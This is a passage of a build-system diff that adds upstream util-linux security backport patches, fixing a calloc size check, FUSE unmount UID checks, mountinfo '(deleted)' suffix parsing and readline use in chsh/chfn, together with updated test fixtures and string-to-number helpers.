99 --without-udev \ 100 --without-udev \
100 \ 101 \
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
1From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Tue, 27 Jul 2021 11:58:31 +0200
4Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
5 nmembs
6
7Fix: https://github.com/karelzak/util-linux/issues/1395
8Signed-off-by: Karel Zak <kzak@redhat.com>
9
10CVE: CVE-2021-37600
11Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
12
13Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
14---
15 sys-utils/ipcutils.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
19index e784c4dcb..18868cfd3 100644
20--- a/sys-utils/ipcutils.c
21+++ b/sys-utils/ipcutils.c
22@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
23 {
24 size_t i;
25
26- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
27+ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
28 return;
29
30 p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
31--
322.25.1
33
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
1From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Wed, 24 Nov 2021 13:53:25 +0100
4Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
5
6Improper UID check allows an unprivileged user to unmount FUSE
7filesystems of users with similar UID.
8
9Signed-off-by: Karel Zak <kzak@redhat.com>
10
11CVE: CVE-2021-3995
12Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
13Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14
15---
16 include/strutils.h | 2 +-
17 libmount/src/context_umount.c | 14 +++---------
18 libmount/src/mountP.h | 1 +
19 libmount/src/optstr.c | 42 +++++++++++++++++++++++++++++++++++
20 4 files changed, 47 insertions(+), 12 deletions(-)
21
22diff --git a/include/strutils.h b/include/strutils.h
23index 6e95707ea9..a84d29594d 100644
24--- a/include/strutils.h
25+++ b/include/strutils.h
26@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
27 if (n + 1 > nmax)
28 n = nmax - 1;
29
30+ memset(dest, '\0', nmax);
31 memcpy(dest, src, n);
32- dest[nmax-1] = '\0';
33 return dest;
34 }
35
36diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
37index 173637a15a..8773c65ffa 100644
38--- a/libmount/src/context_umount.c
39+++ b/libmount/src/context_umount.c
40@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
41 struct libmnt_ns *ns_old;
42 const char *type = mnt_fs_get_fstype(cxt->fs);
43 const char *optstr;
44- char *user_id = NULL;
45- size_t sz;
46- uid_t uid;
47- char uidstr[sizeof(stringify_value(ULONG_MAX))];
48+ uid_t uid, entry_uid;
49
50 *errsv = 0;
51
52@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
53 optstr = mnt_fs_get_fs_options(cxt->fs);
54 if (!optstr)
55 return 0;
56-
57- if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
58- return 0;
59-
60- if (sz == 0 || user_id == NULL)
61+ if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
62 return 0;
63
64 /* get current user */
65@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
66 return 0;
67 }
68
69- snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
70- return strncmp(user_id, uidstr, sz) == 0;
71+ return uid == entry_uid;
72 }
73
74 /*
75diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
76index d43a835418..22442ec55e 100644
77--- a/libmount/src/mountP.h
78+++ b/libmount/src/mountP.h
79@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
80 const struct libmnt_optmap **mapent);
81
82 /* optstr.c */
83+extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
84 extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
85 extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
86 extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
87diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
88index 921b9318e7..16800f571c 100644
89--- a/libmount/src/optstr.c
90+++ b/libmount/src/optstr.c
91@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
92 return rc;
93 }
94
95+/*
96+ * Converts value from @optstr addressed by @name to uid.
97+ *
98+ * Returns: 0 on success, 1 if not found, <0 on error
99+ */
100+int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
101+{
102+ char *value = NULL;
103+ size_t valsz = 0;
104+ char buf[sizeof(stringify_value(UINT64_MAX))];
105+ int rc;
106+ uint64_t num;
107+
108+ assert(optstr);
109+ assert(name);
110+ assert(uid);
111+
112+ rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
113+ if (rc != 0)
114+ goto fail;
115+
116+ if (valsz > sizeof(buf) - 1) {
117+ rc = -ERANGE;
118+ goto fail;
119+ }
120+ mem2strcpy(buf, value, valsz, sizeof(buf));
121+
122+ rc = ul_strtou64(buf, &num, 10);
123+ if (rc != 0)
124+ goto fail;
125+ if (num > ULONG_MAX || (uid_t) num != num) {
126+ rc = -ERANGE;
127+ goto fail;
128+ }
129+ *uid = (uid_t) num;
130+
131+ return 0;
132+fail:
133+ DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
134+ return rc;
135+}
136+
137 /**
138 * mnt_match_options:
139 * @optstr: options string
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
1From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Tue, 4 Jan 2022 10:54:20 +0100
4Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
5
6This issue is related to parsing the /proc/self/mountinfo file allows an
7unprivileged user to unmount other user's filesystems that are either
8world-writable themselves or mounted in a world-writable directory.
9
10The support for "(deleted)" is no more necessary as the Linux kernel does
11not use it in /proc/self/mountinfo and /proc/self/mount files anymore.
12
13Signed-off-by: Karel Zak <kzak@redhat.com>
14
15CVE: CVE-2021-3996
16Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
17Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
18
19---
20 libmount/src/tab_parse.c | 5 -----
21 tests/expected/findmnt/filter-options | 1 -
22 tests/expected/findmnt/filter-options-nameval-neg | 3 +--
23 tests/expected/findmnt/filter-types-neg | 1 -
24 tests/expected/findmnt/outputs-default | 3 +--
25 tests/expected/findmnt/outputs-force-tree | 3 +--
26 tests/expected/findmnt/outputs-kernel | 3 +--
27 tests/expected/libmount/tabdiff-mount | 1 -
28 tests/expected/libmount/tabdiff-move | 1 -
29 tests/expected/libmount/tabdiff-remount | 1 -
30 tests/expected/libmount/tabdiff-umount | 1 -
31 tests/expected/libmount/tabfiles-parse-mountinfo | 11 -----------
32 tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
33 tests/ts/findmnt/files/mountinfo | 1 -
34 tests/ts/findmnt/files/mountinfo-nonroot | 1 -
35 tests/ts/libmount/files/mountinfo | 1 -
36 16 files changed, 4 insertions(+), 44 deletions(-)
37
38diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
39index 917779ab6d..4407f9c9c7 100644
40--- a/libmount/src/tab_parse.c
41+++ b/libmount/src/tab_parse.c
42@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
43 goto fail;
44 }
45
46- /* remove "\040(deleted)" suffix */
47- p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
48- if (p && *p)
49- *p = '\0';
50-
51 s = skip_separator(s);
52
53 /* (6) vfs options (fs-independent) */
54diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
55index 2606bce76b..97b0ead0ad 100644
56--- a/tests/expected/findmnt/filter-options
57+++ b/tests/expected/findmnt/filter-options
58@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
59 /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
60 /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
61 /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
62-/mnt/foo /fooooo bar rw,relatime
63 rc=0
64diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
65index 5471d65af1..f0467ef755 100644
66--- a/tests/expected/findmnt/filter-options-nameval-neg
67+++ b/tests/expected/findmnt/filter-options-nameval-neg
68@@ -29,6 +29,5 @@ TARGET SOURCE FSTYPE OPTIO
69 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
70 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
71 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
72-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
73-`-/mnt/foo /fooooo bar rw,relatime
74+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
75 rc=0
76diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
77index 2606bce76b..97b0ead0ad 100644
78--- a/tests/expected/findmnt/filter-types-neg
79+++ b/tests/expected/findmnt/filter-types-neg
80@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
81 /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
82 /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
83 /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
84-/mnt/foo /fooooo bar rw,relatime
85 rc=0
86diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
87index 59495797bd..01599355ec 100644
88--- a/tests/expected/findmnt/outputs-default
89+++ b/tests/expected/findmnt/outputs-default
90@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
91 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
92 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
93 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
94-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
95-`-/mnt/foo /fooooo bar rw,relatime
96+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
97 rc=0
98diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
99index 59495797bd..01599355ec 100644
100--- a/tests/expected/findmnt/outputs-force-tree
101+++ b/tests/expected/findmnt/outputs-force-tree
102@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
103 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
104 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
105 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
106-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
107-`-/mnt/foo /fooooo bar rw,relatime
108+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
109 rc=0
110diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
111index 59495797bd..01599355ec 100644
112--- a/tests/expected/findmnt/outputs-kernel
113+++ b/tests/expected/findmnt/outputs-kernel
114@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
115 |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
116 | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
117 |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
118-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
119-`-/mnt/foo /fooooo bar rw,relatime
120+`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
121 rc=0
122diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
123index 420aeacd5e..3c18f8dc4f 100644
124--- a/tests/expected/libmount/tabdiff-mount
125+++ b/tests/expected/libmount/tabdiff-mount
126@@ -1,3 +1,2 @@
127 /dev/mapper/kzak-home on /home/kzak: MOUNTED
128-/fooooo on /mnt/foo: MOUNTED
129 tmpfs on /mnt/test/foo bar: MOUNTED
130diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
131index 24f9bc791b..95820d93ef 100644
132--- a/tests/expected/libmount/tabdiff-move
133+++ b/tests/expected/libmount/tabdiff-move
134@@ -1,3 +1,2 @@
135 //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
136-/fooooo on /mnt/foo: UMOUNTED
137 tmpfs on /mnt/test/foo bar: UMOUNTED
138diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
139index 82ebeab390..876bfd9539 100644
140--- a/tests/expected/libmount/tabdiff-remount
141+++ b/tests/expected/libmount/tabdiff-remount
142@@ -1,4 +1,3 @@
143 /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
144 //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
145-/fooooo on /mnt/foo: UMOUNTED
146 tmpfs on /mnt/test/foo bar: UMOUNTED
147diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
148index a3e0fe48a1..c7be725b92 100644
149--- a/tests/expected/libmount/tabdiff-umount
150+++ b/tests/expected/libmount/tabdiff-umount
151@@ -1,3 +1,2 @@
152 /dev/mapper/kzak-home on /home/kzak: UMOUNTED
153-/fooooo on /mnt/foo: UMOUNTED
154 tmpfs on /mnt/test/foo bar: UMOUNTED
155diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
156index 47eb770061..d5ba5248e4 100644
157--- a/tests/expected/libmount/tabfiles-parse-mountinfo
158+++ b/tests/expected/libmount/tabfiles-parse-mountinfo
159@@ -351,17 +351,6 @@ id: 47
160 parent: 20
161 devno: 0:38
162 ------ fs:
163-source: /fooooo
164-target: /mnt/foo
165-fstype: bar
166-optstr: rw,relatime
167-VFS-optstr: rw,relatime
168-FS-opstr: rw
169-root: /
170-id: 48
171-parent: 20
172-devno: 0:39
173------- fs:
174 source: tmpfs
175 target: /mnt/test/foo bar
176 fstype: tmpfs
177diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
178index 47eb770061..d5ba5248e4 100644
179--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
180+++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
181@@ -351,17 +351,6 @@ id: 47
182 parent: 20
183 devno: 0:38
184 ------ fs:
185-source: /fooooo
186-target: /mnt/foo
187-fstype: bar
188-optstr: rw,relatime
189-VFS-optstr: rw,relatime
190-FS-opstr: rw
191-root: /
192-id: 48
193-parent: 20
194-devno: 0:39
195------- fs:
196 source: tmpfs
197 target: /mnt/test/foo bar
198 fstype: tmpfs
199diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
200index 475ea1a337..ff1e664a84 100644
201--- a/tests/ts/findmnt/files/mountinfo
202+++ b/tests/ts/findmnt/files/mountinfo
203@@ -30,4 +30,3 @@
204 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
205 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
206 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
207-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
208diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
209index e15b467016..87b421d2ef 100644
210--- a/tests/ts/findmnt/files/mountinfo-nonroot
211+++ b/tests/ts/findmnt/files/mountinfo-nonroot
212@@ -29,4 +29,3 @@
213 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
214 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
215 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
216-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
217diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
218index c063071833..2b01740481 100644
219--- a/tests/ts/libmount/files/mountinfo
220+++ b/tests/ts/libmount/files/mountinfo
221@@ -30,5 +30,4 @@
222 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
223 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
224 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
225-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
226 49 20 0:56 / /mnt/test/foo bar rw,relatime shared:323 - tmpfs tmpfs rw
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
1From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Thu, 10 Feb 2022 12:03:17 +0100
4Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
5
6The readline library uses INPUTRC= environment variable to get a path
7to the library config file. When the library cannot parse the
8specified file, it prints an error message containing data from the
9file.
10
11Unfortunately, the library does not use secure_getenv() (or a similar
12concept) to avoid vulnerabilities that could occur if set-user-ID or
13set-group-ID programs.
14
15Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
16Signed-off-by: Karel Zak <kzak@redhat.com>
17
18Upstream-status: Backport
19https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17
20
21CVE: CVE-2022-0563
22
23Signed-off-by: Steve Sakoman <steve@sakoman.com>
24
25---
26 login-utils/Makemodule.am | 2 +-
27 login-utils/chfn.c | 16 +++------------
28 login-utils/chsh.c | 42 ++-------------------------------------
29 3 files changed, 6 insertions(+), 54 deletions(-)
30
31diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
32index fac5bfc..73636af 100644
33--- a/login-utils/Makemodule.am
34+++ b/login-utils/Makemodule.am
35@@ -82,7 +82,7 @@ chfn_chsh_sources = \
36 login-utils/ch-common.c
37 chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
38 chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
39-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
40+chfn_chsh_ldadd = libcommon.la
41
42 if CHFN_CHSH_PASSWORD
43 chfn_chsh_ldadd += -lpam
44diff --git a/login-utils/chfn.c b/login-utils/chfn.c
45index b739555..2f8e44a 100644
46--- a/login-utils/chfn.c
47+++ b/login-utils/chfn.c
48@@ -56,11 +56,6 @@
49 # include "auth.h"
50 #endif
51
52-#ifdef HAVE_LIBREADLINE
53-# define _FUNCTION_DEF
54-# include <readline/readline.h>
55-#endif
56-
57 struct finfo {
58 char *full_name;
59 char *office;
60@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
61 {
62 int len;
63 char *buf;
64-#ifndef HAVE_LIBREADLINE
65- size_t dummy = 0;
66-#endif
67
68 if (!def_val)
69 def_val = "";
70+
71 while (true) {
72 printf("%s [%s]: ", question, def_val);
73 __fpurge(stdin);
74-#ifdef HAVE_LIBREADLINE
75- rl_bind_key('\t', rl_insert);
76- if ((buf = readline(NULL)) == NULL)
77-#else
78+
79 if (getline(&buf, &dummy, stdin) < 0)
80-#endif
81 errx(EXIT_FAILURE, _("Aborted."));
82+
83 /* remove white spaces from string end */
84 ltrim_whitespace((unsigned char *) buf);
85 len = rtrim_whitespace((unsigned char *) buf);
86diff --git a/login-utils/chsh.c b/login-utils/chsh.c
87index a9ebec8..ee6ff87 100644
88--- a/login-utils/chsh.c
89+++ b/login-utils/chsh.c
90@@ -58,11 +58,6 @@
91 # include "auth.h"
92 #endif
93
94-#ifdef HAVE_LIBREADLINE
95-# define _FUNCTION_DEF
96-# include <readline/readline.h>
97-#endif
98-
99 struct sinfo {
100 char *username;
101 char *shell;
102@@ -121,33 +116,6 @@ static void print_shells(void)
103 endusershell();
104 }
105
106-#ifdef HAVE_LIBREADLINE
107-static char *shell_name_generator(const char *text, int state)
108-{
109- static size_t len;
110- char *s;
111-
112- if (!state) {
113- setusershell();
114- len = strlen(text);
115- }
116-
117- while ((s = getusershell())) {
118- if (strncmp(s, text, len) == 0)
119- return xstrdup(s);
120- }
121- return NULL;
122-}
123-
124-static char **shell_name_completion(const char *text,
125- int start __attribute__((__unused__)),
126- int end __attribute__((__unused__)))
127-{
128- rl_attempted_completion_over = 1;
129- return rl_completion_matches(text, shell_name_generator);
130-}
131-#endif
132-
133 /*
134 * parse_argv () --
135 * parse the command line arguments, and fill in "pinfo" with any
136@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
137 {
138 int len;
139 char *ans = NULL;
140-#ifdef HAVE_LIBREADLINE
141- rl_attempted_completion_function = shell_name_completion;
142-#else
143 size_t dummy = 0;
144-#endif
145+
146 if (!oldshell)
147 oldshell = "";
148 printf("%s [%s]\n", question, oldshell);
149-#ifdef HAVE_LIBREADLINE
150- if ((ans = readline("> ")) == NULL)
151-#else
152 if (getline(&ans, &dummy, stdin) < 0)
153-#endif
154 return NULL;
155+
156 /* remove the newline at the end of ans. */
157 ltrim_whitespace((unsigned char *) ans);
158 len = rtrim_whitespace((unsigned char *) ans);
159--
1602.25.1
161
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
1From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
2From: Karel Zak <kzak@redhat.com>
3Date: Tue, 22 Jun 2021 14:20:42 +0200
4Subject: [PATCH] include/strutils: cleanup strto..() functions
5
6* add ul_strtos64() and ul_strtou64()
7* add simple test
8
9Addresses: https://github.com/karelzak/util-linux/issues/1358
10Signed-off-by: Karel Zak <kzak@redhat.com>
11
12Upstream-Backport: [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
13Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
14
15---
16 include/strutils.h | 3 +
17 lib/strutils.c | 174 ++++++++++++++++++++++++++-------------------
18 2 files changed, 105 insertions(+), 72 deletions(-)
19
20diff --git a/include/strutils.h b/include/strutils.h
21index e75a2f0e17..389e849905 100644
22--- a/include/strutils.h
23+++ b/include/strutils.h
24@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
25 extern int strtosize(const char *str, uintmax_t *res);
26 extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
27
28+extern int ul_strtos64(const char *str, int64_t *num, int base);
29+extern int ul_strtou64(const char *str, uint64_t *num, int base);
30+
31 extern int16_t strtos16_or_err(const char *str, const char *errmesg);
32 extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
33 extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
34diff --git a/lib/strutils.c b/lib/strutils.c
35index ee2c835495..d9976dca70 100644
36--- a/lib/strutils.c
37+++ b/lib/strutils.c
38@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
39 }
40 #endif
41
42-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
43-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
44+/*
45+ * convert strings to numbers; returns <0 on error, and 0 on success
46+ */
47+int ul_strtos64(const char *str, int64_t *num, int base)
48+{
49+ char *end = NULL;
50
51-int16_t strtos16_or_err(const char *str, const char *errmesg)
52+ errno = 0;
53+ if (str == NULL || *str == '\0')
54+ return -EINVAL;
55+ *num = (int64_t) strtoimax(str, &end, base);
56+
57+ if (errno || str == end || (end && *end))
58+ return -EINVAL;
59+ return 0;
60+}
61+
62+int ul_strtou64(const char *str, uint64_t *num, int base)
63 {
64- int32_t num = strtos32_or_err(str, errmesg);
65+ char *end = NULL;
66
67- if (num < INT16_MIN || num > INT16_MAX) {
68- errno = ERANGE;
69- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
70- }
71- return num;
72+ errno = 0;
73+ if (str == NULL || *str == '\0')
